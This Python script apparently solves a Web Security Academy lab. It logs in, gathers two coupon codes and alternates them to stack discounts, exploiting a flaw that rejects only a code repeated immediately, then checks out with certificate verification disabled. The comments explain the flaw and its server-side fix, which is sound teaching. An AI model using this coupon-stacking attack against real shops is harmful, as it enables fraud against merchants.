import re
from urllib.parse import urljoin

import requests
import urllib3
from bs4 import BeautifulSoup
# Every proxied request below is sent with verify=False; silence the
# InsecureRequestWarning urllib3 would otherwise print for each of them.
# With verification off the client accepts any certificate, so these settings
# only suit a lab instance reached through a local intercepting proxy.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Lab instance under test and the local proxy the requests are routed through.
base_url = 'https://0a3900c2044cf17781f1123e00480036.web-security-academy.net/'
proxies = dict.fromkeys(('http', 'https'), 'http://127.0.0.1:8080')
# Get CSRF Token
def get_csrf_token(session, url):
    """Fetch *url* and return the ``value`` of its ``<input name="csrf">``.

    Args:
        session: Object exposing ``get`` the way ``requests.Session`` does.
        url: Page that carries the form with the CSRF field.

    Returns:
        The ``value`` attribute of the first ``input`` named ``csrf``.
    """
    page = session.get(url, proxies=proxies, verify=False)
    document = BeautifulSoup(page.text, 'html.parser')
    csrf_field = document.find('input', {'name': 'csrf'})
    # find() returns None when the page has no such input; the attribute
    # lookup below then raises AttributeError.
    return csrf_field.get('value')
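def get_coupon_codes(session, url):
    """Collect the two coupon codes the shop hands out.

    Fetches *url* and reads the new-customer code from that page, then submits
    the newsletter sign-up form and reads the second code from the response.

    Args:
        session: Object exposing ``get``/``post`` like ``requests.Session``.
        url: Base URL of the shop; the sign-up endpoint is resolved against it.

    Returns:
        A two-item list: ``[new_customer_code, signup_code]``.

    Raises:
        ValueError: If either code is missing from the response it is
            expected in.
    """
    response = session.get(url, proxies=proxies, verify=False)
    soup = BeautifulSoup(response.content, "html.parser")
    csrf_token = get_csrf_token(session, url)

    # Sign up for the newsletter
    form_data = {
        "csrf": csrf_token,
        "email": "attacker@evil.sec"  # Replace with your email address
    }
    # urljoin rather than string concatenation, so a host-only base URL
    # without a trailing slash still resolves to a valid endpoint.
    # NOTE(review): unlike the other requests in this file, this POST passes
    # neither proxies nor verify=False, so it goes to the server directly with
    # certificate verification on -- confirm that is intended.
    signup_response = session.post(urljoin(url, "sign-up"), data=form_data)

    # Extract coupon codes from the responses. re.search returns None on a
    # miss, so check before calling .group() and fail with a message that
    # says which code was not found.
    newcust_match = re.search(
        r'New customers use code at checkout: (\w+)', str(soup)
    )
    if newcust_match is None:
        raise ValueError(f"new-customer coupon code not found on {url}")

    signup_match = re.search(
        r'(?<=coupon )([A-Z]+[0-9]+)', signup_response.text
    )
    if signup_match is None:
        raise ValueError("sign-up coupon code not found in sign-up response")

    # Return coupon codes as a list
    return [newcust_match.group(1), signup_match.group()]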
# Purchase Item
def purchase_item(session, url):
    """Log in, add product 1 to the cart, apply the coupons and check out.

    Prints progress and the outcome; returns nothing. Endpoint URLs are built
    from the module-level ``base_url``; *url* is only passed on to
    ``get_coupon_codes``.

    The coupon loop submits the two codes alternately, four rounds in total.
    Presumably the cart only rejects a code that repeats the one applied
    immediately before it, so alternating gets every submission accepted --
    the page does not state this, confirm against the lab description. The
    server-side fix for that class of flaw is to record every code redeemed
    on a cart or order and reject any code already in that set.

    Args:
        session: Object exposing ``get``/``post`` like ``requests.Session``.
        url: Base URL handed to ``get_coupon_codes``.
    """
    # Login
    login_url = urljoin(base_url, 'login')
    credentials = {
        'username': 'wiener',
        'password': 'peter',
        'csrf': get_csrf_token(session, login_url),
    }
    login_result = session.post(
        login_url, data=credentials, proxies=proxies, verify=False
    )
    # NOTE(review): requests follows redirects by default, so a final 200
    # does not by itself prove the credentials were accepted.
    if login_result.status_code != 200:
        print("Failed to log in.")
        return

    # Add item
    cart_url = urljoin(base_url, 'cart')
    session.post(
        cart_url,
        data={'productId': '1', 'redir': 'PRODUCT', 'quantity': '1'},
        proxies=proxies,
        verify=False,
    )

    # Add coupon: four rounds over the code list, a fresh CSRF token each time.
    coupon_url = urljoin(base_url, 'cart/coupon')
    codes = get_coupon_codes(session, url)
    for _ in range(4):
        for code in codes:
            token = get_csrf_token(session, cart_url)
            session.post(
                coupon_url,
                data={'csrf': token, 'coupon': code},
                proxies=proxies,
                verify=False,
            )
            # The response is not inspected, so this line is printed whether
            # or not the server accepted the code.
            print(f"Added coupon {code}")

    # Checkout
    checkout_url = urljoin(base_url, 'cart/checkout')
    checkout_result = session.post(
        checkout_url,
        data={'csrf': get_csrf_token(session, cart_url)},
        proxies=proxies,
        verify=False,
    )
    if checkout_result.status_code == 200:
        print("Purchase successful!")
    else:
        print("Failed to checkout.")
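def main():
    """Run the lab workflow once with a fresh HTTP session."""
    # The context manager closes the session's pooled connections on exit,
    # including when purchase_item raises.
    with requests.Session() as session:
        purchase_item(session, base_url)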
# Run the workflow only when executed as a script, not when imported.
if __name__ == "__main__":
    main()